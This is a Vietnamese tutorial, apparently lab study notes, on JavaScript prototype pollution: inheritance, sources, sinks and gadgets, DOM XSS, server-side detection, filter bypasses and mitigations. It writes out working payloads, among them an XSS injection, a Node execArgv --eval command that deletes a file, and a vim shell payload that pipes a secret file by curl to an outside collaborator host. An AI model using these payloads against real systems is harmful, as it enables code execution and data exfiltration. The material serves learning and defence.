🔐Prototype pollution
Last updated
Last updated
property: thuộc tính, object: đối tượng
Prototype pollution là lỗ hổng mà kẻ tấn công có thể thêm bất kỳ thuộc tính nào vào các global object prototype.
Mặc dù lỗ hổng này thường không thể khai thác như mỗi lỗ hổng độc lập, nó để cho kẻ tấn công. Nếu ứng dụng sau đó xử lý một property(một thuộc tính) của kẻ tấn công kiểm soát theo một cách không an toàn, điều này có khả năng chain tới lỗ hổng khác.
Trong lỗ hổng client Javascript, nó mang dẫn đến lỗ hổng DOM XSS, trong khi prototype pollution phía server side thì dẫn tới RCE(удавленное выполнение код).
Ở phần này chúng ta sẽ xem xét prototypes và tính kế thừa của Javascript.
Như các ngôn ngữ cách chúng ta được học thì có môn học OOP (Lập trình hướng đối tượng). Thường sẽ có hai thứ bạn thường được tiếp cận nhiều nhất đó là class
và object
. Có thể hiểu đơn giản rằng class
chính là một cái khung dựng sẵn lên các yếu tố cần thiết cho một object
, con object
sẽ kế thừa lại tất cả các property
và method
Một object của javascript cơ bản là một tập hợp của key:value được biến đên là properties
.
Ví dụ đây là một đoạn object:
Khi đó để truy cập được giá trị thuộc tính trong object này, chúng ta sẽ có hai cách thường dùng như sau: user.roldAdmin
, user['roleAdmin']
Cũng như data thì properties cũng có thể chứa executable function hay còn gọi là hàm thực thi. Khi đó nó được gọi là method
Mọi object trong javascript được liên kết với các object khác được biến đến là prototype. Theo mặc định Javascript sẽ tự động gắn object mới cho một trong các built-in prototypes(các nguyên mẫu được tích hợp sẵn
) của nó.
Hãy xem ví dụ:
Object tự động kết thừa tất cả những thuộc tính của các prototypes được gán, trừ khi chúng đã có thuộc tính(properties) riêng với cùng một khóa. Điều này cho phép các nhà phát triển tạo các đối tượng mới có thể sử dụng lại các thuộc tính và phương thức của các đối tượng hiện có.
Bất cứ khi nào chúng ta tham khảo thuộc tính của một object thì javascript enginer sẽ đưa cho chúng ta các thuộc tính mà chưa được định nghĩa ở trong object đó.
Nếu khó hiểu chúng ta hãy xem xét ví dụ như sau:
Chúng ta thấy rằng ở Object admin
chúng ta khai báo không hề có thuộc tính nào nhưng khi kiểm tra thì nó có rất nhiều thuộc tính và method trong đó và những thuộc tính trên đều được kế thừ từ Object.prototype
Prototype chain là một tính năng quan trọng trong JavaScript cho phép các đối tượng kế thừa các tính năng từ các đối tượng khác. Mỗi đối tượng trong JavaScript đều có một thuộc tính prototype, cho biết đối tượng kế thừa các tính năng từ đối tượng nào.
Điều quan trọng là các object kế thừa các properties không chỉ từ prototype trực tiếp của chúng mà còn từ tất cả các object phía trên chúng trong prototype chain. Trong ví dụ trên, điều này có nghĩa là object username có quyền truy cập vào các properties và method của cả String.prototype
và Object.prototype
. Các object khác cũng tương tự như vậy.
Thật ra có thể truy cập prototype của object bằng hai cách, ngoài dùng __proto__
thì có thể dùng function constructor()
Ở phần này chúng ta sẽ nói tới __proto__
. Thì mọi object có một property đặc biệt mà bạn có thể sử dụng để truy cập prototype chính nó.
Dễ hiểu hơn thì: __proto__
cho phép một object truy cập thẳng vào property prototype
của cha nó.
Với bất kỳ thuộc tính nào bạn chỉ cần truy cập tới __proto__
bằng cách sử dụng dot nonation
hoặc bracket
Sửa đổi prototype, mặc dù nó thường được coi là một cách làm không tốt, nhưng vẫn có thể sửa đổi các built-in prototype của JavaScript giống như bất kỳ object nào khác. Điều này có nghĩa là các nhà phát triển có thể tùy chỉnh hoặc ghi đè hành vi của các built-in methods và thậm chí thêm các mothods mới để thực hiện các thao tác hữu ích.
Ví dụ: JavaScript hiện đại cung cấp phương thức trim()
cho các chuỗi, cho phép bạn dễ dàng xóa mọi khoảng trắng ở đầu hoặc cuối. Trước khi built-in methods này được giới thiệu, đôi khi các nhà phát triển đã thêm triển khai tùy chỉnh của riêng họ đối với hành vi này vào object String.prototype
bằng cách thực hiện như sau:
Các lỗ hổng gây prototype pollution thường phát sinh khi một hàm JavaScript chứa các properties do người dùng kiểm soát vào một object hiện có mà không cần lọc trước đầu vào. Điều này có thể cho phép kẻ tấn công đưa vào một property bằng cách dùng như __proto__, constructor().
Khai thác thành công prototype pollution yêu cầu các thành phần chính sau:
A prototype pollution source - Đây là bất kỳ đầu vào nào cho phép bạn đầu độc các đối tượng nguyên mẫu bằng các thuộc tính tùy ý.
A SINK - Nói cách khác, một function JavaScript hoặc DOM element cho rce.
An exploitable gadget - Đây là bất kỳ properties nào được đưa vào sink mà không được lọc.
Prototype pollution source là bất kỳ đầu vào nào người dùng có thể kiểm soát mà bạn có thể thêm bất kỳ properties nào tới prototype object.
Xem xét đoạn URL sau, nó chứa chuỗi truy vấn mà kẻ tấn công tạo ra.
Khi chúng ta phân tách đoạn payload trên dưới dạng key và value thì chúng ta sẽ có đoạn sau:
Tuy nhiên trong một số trường hợp phải back từ object được target tới Object.prototype.
Các object do người dùng kiểm soát thường được lấy từ một chuỗi JSON bằng method JSON.parse()
.
JSON.parse()
cũng coi bất kỳ key
nào trong Object JSON là một string, bao gồm những thứ như __proto__
. Điều này cung cấp một vectơ tiềm năng khác cho prototype pollution.
Ví dụ: giả sử kẻ tấn công tiêm JSON độc hại sau qua một thông báo trên web:
Nếu điều này được chuyển đổi thành một object JavaScript thông qua method JSON.parse(), thì trên thực tế, object kết quả sẽ có property với key __proto__, khi đó __proto__ là thuộc tính riêng của objectFromJson :
Chúng ta có thể hiểu rõ hơn bằng hình ảnh dưới đây: Khi objectLiteral được tạo như dưới thì khi đó property evilProperty được gán vào Object.property.
Còn dùng JSON.parse()
để chuyển một string -> object khi đó có một property là __proto__ và nó là một object có property là evilProperty với value là payload.
Prototype pollution sinks về cơ bản chỉ là một function JavaScript hoặc DOM Element mà bạn có thể truy cập thông qua prototype pollution, cho phép bạn thực thi các system commands hoặc JavaScript tùy ý.
Vì prototype pollution cho phép bạn kiểm soát các properties mà nếu không thì không thể truy cập được, điều này có khả năng cho phép bạn tiếp cận một số phần bổ sung trong ứng dụng. Các nhà phát triển không quen với tình trạng pollution có thể cho rằng người dùng không thể kiểm soát các propert, điều đó có nghĩa là có thể chỉ có khả năng lọc ở mức tối thiểu.
Một gadget cung cấp một phương tiện để biến lỗ hổng prototype pollution thành một khai thác thực tế.
Ứng dụng xử lý không an toàn, như là có thể pass qua sink mà không được filter đi.
Kẻ tấn công có thể kiểm soát thông qua prototype pollution. Nói cách khác, Object phải có khả năng inherit property do kẻ tấn công thêm vào propotype.
Nhiều thư viện JavaScript chấp nhận một object mà nhà phát triển có thể sử dụng để đặt các tùy chọn cấu hình khác nhau. Nếu không có property đại diện cho một tùy chọn cụ thể, thì một tùy chọn mặc định được xác định trước thường được sử dụng để thay thế. Một ví dụ đơn giản hóa có thể trông giống như thế này:
Bây giờ hãy xem code thư viện sử dụng transport_url này để thêm script reference vào trang:
Nếu nhà phát triển website không set transport_url
property ở config object của họ, thì đây là một gadget chúng ta có thể khai khác. Trong trường hợp kẻ tấn công có thể injection Object.prototype globbal bằng property transport_url của riêng chúng, property này sẽ được config object inherit và do đó, được đặt làm src cho tập lệnh này thành miền do kẻ tấn công chọn.
Ví dụ: nếu propotype có thể polluted thông qua một query parameter, thì kẻ tấn công chỉ cần dụ nạn nhân truy cập một URL được tạo đặc biệt để khiến trình duyệt của họ nhập tệp JavaScript độc hại từ domain do kẻ tấn công kiểm soát:
Bằng cách cung cấp data: URL, kẻ tấn công cũng có thể inject payload XSS vào trong query parameter như sau:
---- Exploiting prototype pollution for DOM XSS
Tìmclient-side prototype pollution sources theo cách thủ công phần lớn là một trường hợp thử và lỗi. Nói tóm lại, bạn cần thử nhiều cách khác nhau để thêm một property tùy ý vào Object.prototype
cho đến khi tìm được source phù hợp.
When testing for client-side vulnerabilities, this involves the following high-level steps:
Try to inject an arbitrary property via the query string, URL fragment, and any JSON input. For example:
vulnerable-website.com/?__proto__[foo]=bar
Khi test cho lỗ hổng phía client, thực hiện các bước sau:
Cố gắng inject bất kỳ thuộc tính nào qua chuỗi truy vấn, url và bất kỳ đầu vào JSON nào. Ví dụ sau: vulnerable-website.com/?proto[foo]=bar
Vào console của trình duyệt, hãy xem Object.prototype đã được inject thành công hay chưa.
Nếu không thành công thì có thể dùng các kỹ thuật khác để add được property vào như dot notation từ bracket notation: vulnerable-website.com/?proto.foo=bar
Về phần này bạn có thể sử dụng extension của Burp suite, đọc ở đây.
Khi bạn đã xác định được source cho phép bạn thêm các property
tùy ý vào Object.prototype global
, bước tiếp theo là tìm một gadget
phù hợp mà bạn có thể sử dụng để tạo ra một khai thác. Trên thực tế, chúng ta nên sử dụng DOM Invader để thực hiện việc này nhưng sẽ hữu ích nếu xem xét quy trình thủ công vì nó có thể giúp củng cố hiểu biết về lỗ hổng bảo mật.
Xem qua source code và xác định bất kỳ property nào được ứng dụng sử dụng hoặc bất kỳ thư viện nào mà ứng dụng import vào.
Trong Burp, bật interception (Proxy > Options > Intercept server responses) và chặn response có chứa JavaScript mà bạn muốn kiểm tra.
Thêm một câu lệnh debugger
ở đầu script, sau đó forward
mọi request và response còn lại.
Trong trình duyệt của burp, đi tới trang mà target script được load. Câu lệnh debugger
dừng thực thi script.
Trong khi script vẫn pause,chuyển sang console và nhập đoạn code dưới đây, thay thế YOUR-PROPERTY
với một trong các property mà bạn nghĩ sẽ là một gadget có tiềm năng để inject:
Property được add vào global Object.prototype
và trình duyệt sẽ log một tới console bất cứ khi nào nó được truy cập
Nhấn vào nút để tiếp tục thực thi lệnh và theo dõi console. Nếu stack trace xuất hiện, điều này xác nhận rằng property đã được truy cập ở nơi nào đó trong ứng dụng
Mở rộng stack trace và dùng link được cung cấp chuyển đến dòng code mà property đang được đọc
Sử dụng các debugger controls của trình duyệt, duyệt qua từng giai đoạn thực thi để xem liệu property có được chuyển đến sink hay không, chẳng hạn như innerHTML()
hoặc eval()
.
Lặp lại quy trình này cho bất kỳ property nào mà bạn cho là gadget tiềm năng.
Đọc ở đây.
Ngoài __proto__
thì chúng ta có thể truy cập prototype object thông qua thuộc tính có sẵn đó là constructor
Constructor
là một thuộc tính đặc biệt trả về hàm đã được dùng để tạo ra đối tượng đó. Prototype object có constructor chỉ đến hàm đó và constructor của constructor sẽ là hàm constructor toàn cục (global).
Trong JavaScript, mỗi object được tạo ra từ một constructor function, có trách nhiệm thiết lập các thuộc tính và hành vi ban đầu của object.
Khi bạn tạo một object bằng cú pháp object literal, ví dụ như const person = {}
, JavaScript sẽ tạo ra object và đặt thuộc tính [[Prototype]]
của nó thành object Object.prototype
mặc định. Object.prototype
là constructor function cho tất cả các object trong JavaScript.
Bạn có thể truy cập constructor function của một object bằng cách sử dụng thuộc tính constructor
. Ví dụ, person.constructor
trả về constructor function mà đã được sử dụng để tạo ra object person
. Trong trường hợp này, nó trả về constructor function Object()
.
Tương tự, bạn có thể truy cập constructor function của một constructor function bằng cách gọi thuộc tính constructor
của nó. Ví dụ, person.constructor.constructor
trả về constructor function Function()
, vì Object()
là một constructor function tích hợp và được tạo ra bằng cách sử dụng constructor function Function()
.
Và ngoài ra persion.constructor.prototype
sẽ như person.__proto__
Một cách rõ ràng để một website ngăn chặn lỗ hổng prototype pollution là lọc property key được khi cho nó vào một object. Tuy nhiên một lỗ chung là không lặp lại quá trình lọc một lần nữa.
Ví dụ trong một trang web sẽ filter đi __proto__
ở đầu vào nếu có nó xuất hiện thì ở đây dev chỉ lọc duy nhất một lần mà không kiểm tra lại.
Khi đó nó sẽ trở thành ?proto.gadget=payload
và vẫn exploit bình thường.
Fetch API cũng cấp cho các nhà phát triển để trigger HTTP Request sử dụng JS. Fetch() gồm 2 tham số:
URL mà muốn gửi request tới
Một object tự chọn mà nó là một phần của request như là method, header, body, parameter ...
Chúng ta sẽ xem xét đoạn code JS sau:
Để exploit đoạn code này thì kẻ tấn công cần polluted được Object.prototype
với một property headers
chứa một header độc hại x-username
?proto[headers][x-username]=<img/src/onerror=alert(1)>
Cuối cùng giá trị của property x-username
sẽ được trả về file JSON sau đó nó sẽ được gán cho username
và đi tới innerHTML
Các nhà phát triển hiện tại đã block các gadgets tiềm năng để exploit. Xem ví dụ như này:
Đọc ở đây
Có thể dùng key value
mặc định để inject thay cho transport_url
Chúng ta sẽ xem xét ví dụ sau:
Xem ví dụ trên chúng ta thấy rằng có một Object là Person có 2 proprerties keys là name và age. Nhưng sau đó thêm một property admin vào Object.prototype, tiến theo đó kiểm tra xem admin có phải property thuộc Object Person không thì nhận về
false
. Điều đang nói ở đây khi chúng ta dùng vòng lặp for để in ra key thì nó có property admin. Có nghĩa là Object Person đã kế thừa property admin từ Object.prototype.
Vậy lúc này đang false thì inject thành true qua __proto__
Thường thì lỗ hổng prototype pollution nó sẽ không reflect ra ngoài nhưng không có nghĩa chúng ta không có căn căn gì để khai thác nó.
Chúng ta sẽ xem xét 3 kỹ thuật sau:
Status code override
JSON spaces override
Charset override
Server-side Javascript frameworks như là Express cho phép các dev tạo HTTP response status. Trong trường hợp lỗi thì phía server có thể đưa ra một HTTP response chung, nhưng nó bao gồm một object lỗi với định dạng JSON ở body, nó cung cấp chi tiết lỗi xảy xa.
Ở đây khi nhắc tới lỗi thì có nó nghĩa là bạn nhập sai thứ gì đó không cho phép hoặc không được phép truy cập một path nào đó của trang web ...
Ví dụ một trang web vẫn trả về status 200 nhưng đi kèm một object JSON báo lỗi kèm status ở trong JSON là 400
Điều này được sinh ra vì trong NodeJS có một module tên là http-errors có chứa đoạn code sau:
Nhìn sơ qua đoạn code thì chúng ta có thể thấy status
nếu không được lọc kỹ càng thi chúng ta có thể polluted status
Express Framework cung câp một option là json space
, nó cho phép số lượng space để thụt lè bất cứ một JSON data nào có trong response. Hãy thử inject xem nó có bị ảnh hưởng hay không?
Express server sẽ để middleware xử lý các request trước khi nó được server xử lý. Cho một ví dụ một module body-parse
thường được sử dụng để parse phần body trong request gửi tới để generate một req.body
object.
Lưu ý rằng sau đó đoạn mã dưới đây sẽ pases một object bất kỳ tới hàm read()
, cái mà đọc phần body của request để parse. Một trong nhưng tùy chọn là encoding
, xác định những ký tự encode để dùng. Điều này được bắt nguồn từ request đó thông qua hàm được gọi là getCharset(req)
hoặc default là UTF-8
Xem xét kỹ hàm getCharset()
dường như các dev đã dự kiến Content-Type
header có thể chứa các charset không rõ ràng bởi vậy họ đã thực hiện một số logic để revert một chuỗi trống trong trường hợp này.
Ví dụ trong UTF-7 thì foo
là +AGYAbwBv-
{ "sessionId":"0123456789", "username":"wiener", "role":"+AGYAbwBv-" }
Gửi request đi mà server không sử dụng UTF-7 encode theo default bởi vậy chuỗi string trên sẽ xuất hiện ở dạng được encode.
Thử polluted prototype qua content-type
property bằng các charset UFT-7:
{ "sessionId":"0123456789", "username":"wiener", "role":"default", "proto":{ "content-type": "application/json; charset=utf-7" }
Gửi lại request ở đầu tiên. nếu có thể polluted content-type
theo UTF-7 vừa được inject thì res sẽ như này:
{ "sessionId":"0123456789", "username":"wiener", "role":"foo" }
Do một bug trong _http_incoming
module mà điều này vẫn hoạt động ngay cả khi loại bỏ header Content-Type
. Để tráng overwrite properties thì hàm _addHeaderLine()
sẽ check xem có property nào trùng lặp không được khi chuyển tới IncomingMessage
Object
@protection: Khi này header sẽ được xử lý loại bỏ một cách hiệu quả.
Chúng ta có thể sử dụng Burp suite với extension Server-Side Prototype Pollution Scanner để quét.
Các trang web thường cố gắng ngăn chặn hoặc vá các lỗ hổng prototype pollution bằng cách filter các key đáng ngờ như __proto__, nhưng nó có thể bị bypass
Ví dụ, kẻ tấn công có thể:
Obfuscate các từ khóa bị cấm để chúng bị bỏ sót trong quá trình filter. Bypassing flawed key sanitization.
Truy cập prototype thông qua constructor thay vì __proto__
.
Các App code từ nodejs có thể xóa hoặc tắt hoàn toàn __proto__ bằng cách sử dụng command-line
flags --disable-proto=delete
hoặc --disable-proto=throw
tương ứng. Tuy nhiên, điều này cũng có thể được bypass bằng cách sử dụng constructor.
"constructor":{ "prototype":{ "isAdmin":true}}
Để exec shell trong Node,có thể sử dụng mô-đun child_ process. child_process
là một module trong Node.js, cho phép tạo ra các tiến trình con (child process) để thực hiện các tác vụ bất đồng bộ (asynchronous) mà không ảnh hưởng đến tiến trình chính (main process).
Biến môi trường NODE_OPTIONS cho xác định một chuỗi command-line arguments sẽ được sử dụng theo mặc định bất cứ khi nào bắt đầu Node process mới. Vì đây cũng là property trên object env, có thể pollution được.
Một số functions của Node để tạo các child processes mới chấp nhận shell
property tùy chọn, cho phép các dev đặt một shell cụ thể, chẳng hạn như bash, để chạy các lệnh trong đó. Bằng cách kết hợp điều này với property NODE_OPTIONS ,có thể làm pollution bằng các res về server hacker.
Các methods như child_ process.spawn()
và child_ process.fork()
cho phép các dev tạo các child process Node mới. Phương thức fork() chấp nhận một object tùy chọn trong đó một trong các tùy chọn tiềm năng là execArgv
property. Đây là một araycác chuỗi chứa các command-line arguments nên được sử dụng khi sinh ra child process.
Vì gadget này cho phép kiểm soát trực tiếp command-line arguments, điều này cho phép truy cập vào một số vectơ tấn công không thể thực hiện được khi sử dụng NODE_OPTIONS.
Quan tâm đặc biệt là đối số --eval
, cho phép bạn chuyển JavaScript tùy ý sẽ được child process thực thi.
Ngoài fork() thì còn có execSync() có thể RCE.
Sử dụng đối số --eval để rce:
"__proto__":{"execArgv":["--eval=require('child_process').execSync('rm /home/carlos/morale.txt')"]}
curl -X POST -d @-
là một câu lệnh dòng lệnh sử dụng chương trình cURL để gửi một yêu cầu HTTP POST đến một URL cụ thể và gửi dữ liệu được lấy từ đầu vào tiêu chuẩn (stdin).
Cụ thể, -X POST
sử dụng phương thức POST để gửi yêu cầu HTTP, -d
(hoặc --data
) được sử dụng để chỉ định dữ liệu gửi trong yêu cầu và @-
cho phép cURL đọc dữ liệu từ đầu vào tiêu chuẩn (stdin).
Vì @-
được sử dụng để đọc dữ liệu từ đầu vào tiêu chuẩn, nó cho phép bạn gửi dữ liệu tới một yêu cầu HTTP mà không cần phải tạo một tệp tin riêng để chứa dữ liệu đó. Điều này rất hữu ích trong các trường hợp bạn muốn gửi dữ liệu động hoặc dữ liệu được tạo ra bởi một lệnh khác trong cùng một đường ống (pipeline).
Ví dụ: echo '{"name": "John", "age": 30}' | curl -X POST -d @- https://example.com/api
sẽ gửi một yêu cầu POST đến https://example.com/api
với dữ liệu đầu vào là {"name": "John", "age": 30}
.
Thường thì lỗ hổng này nó sẽ không trả dữ liệu ra ngoài nên chúng ta cần RCE rồi gửi tới Server của chúng ta để lấy dữ liệu.
Ở lab dưới thi chúng ta sẽ sử dụng các properties shell và input nếu execArgv bị chặn thực hiện shell bằng vim là phổ biến nhất sau đó ghi input vào và request tới server của mình
"__proto__":{ "shell":"vim", "input":":!cat /home/carlos/secret | base64 | curl -d @- https://558lzpd3v31f3icjmj1lvpjir9x0lp.oastify.com \n"}
Dùng ip-request ngoài không hiểu sao nó không nhận được res.
Để khắc phục lỗ hổng prototype pollution thì có thể có một số cách sau:
Đóng băng các properties bằng Object.freeze(Object.prototype)
Thực hiện validation trên các input JSON theo đúng schema của ứng dụng
Tránh sử dụng các hàm có ghép đệ quy (recursive merge) các đối tượng một cách không an toàn
Sử dụng đối tượng không có thuộc tính prototype, ví dụ Object.create(null)
để tránh ảnh hưởng đến prototype chain
Sử dụng Map
thay vì Object
Cảm ơn các bạn đã đọc bài viết, từ các bài sau mình sẽ chỉ note lại kiến thức chính và sẽ k viết chi tiết nữa thay vào đó viết cách solve các bài lab.